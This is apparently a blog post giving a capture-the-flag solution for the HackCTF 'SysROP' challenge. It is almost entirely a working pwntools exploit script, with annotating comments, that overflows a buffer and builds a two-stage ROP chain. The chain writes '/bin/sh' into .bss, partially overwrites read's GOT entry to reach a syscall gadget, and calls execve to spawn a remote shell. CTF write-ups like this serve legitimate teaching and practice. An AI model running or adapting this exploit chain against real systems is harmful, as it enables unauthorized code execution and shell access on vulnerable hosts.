
HackCTF - SysROP

ii4gsp 2020. 5. 5. 23:05


from pwn import *

# NOTE(review): the payloads below concatenate str ('') with p64() output, which
# only works under Python 2 pwntools; on Python 3 the str/bytes mix raises
# TypeError at the first `payload += p64(...)`.
r = remote('ctf.j0n9hyun.xyz', 3024)
e = ELF('./sysrop')
# `libc` is loaded but never referenced again in this script; no libc symbol or
# offset is used, so the line is dead unless a later stage (not shown) needs it.
libc = ELF('./libc.so.6')

# Stage 1: 0x18 bytes of filler followed by a sequence of 8-byte values — a
# hard-coded gadget address, two small integers, a .bss scratch address, the
# read() PLT entry and a second hard-coded address. The constants 0x4005eb and
# 0x4005f2 are specific to this challenge binary; the script assumes the binary
# is loaded at a fixed address (no PIE) — TODO confirm with checksec.
payload = ''
payload += '\x90' * (0x10 + 0x8)  # 0x18 bytes of filler before the first 8-byte entry
payload += p64(0x00000000004005eb)  # gadget address from the challenge binary
payload += p64(8)
payload += p64(0)
payload += p64(e.bss() + 0x100)  # writable scratch area inside .bss
payload += p64(e.plt['read'])
payload += p64(0x4005f2)  # second hard-coded address from the binary

r.sendline(payload)
sleep(0.1)  # fixed delay instead of waiting for a prompt; fragile on a slow link
# Presumably consumed by the read() staged above into the .bss scratch area — verify.
r.send('/bin/sh\x00')
sleep(0.1)

# Stage 2: same filler and first gadget, then a sequence that names the GOT
# entry of read() and the .bss scratch address as arguments; 59 is the x86-64
# execve syscall number. Because e.got['read'] is used as a write target, a
# binary built with Full RELRO (read-only GOT after load) would fault here,
# which is the mitigation this chain depends on being absent.
payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(1)
payload += p64(0)
payload += p64(e.got['read'])  # GOT slot of read() passed as an argument
payload += p64(e.plt['read'])
payload += p64(0x00000000004005ea)  # hard-coded address from the binary
payload += p64(59)  # execve syscall number on x86-64
payload += p64(0x0)
payload += p64(e.bss() + 0x100)  # same .bss scratch address as stage 1
payload += p64(0x0)
payload += p64(e.plt['read'])

r.sendline(payload)
sleep(0.1)
# A single byte is sent here; the value 0x5e is tied to the exact libc build
# loaded by the remote service (hence ./libc.so.6), so it is not portable.
r.send('\x5e')
sleep(0.1)

r.interactive()

Exploit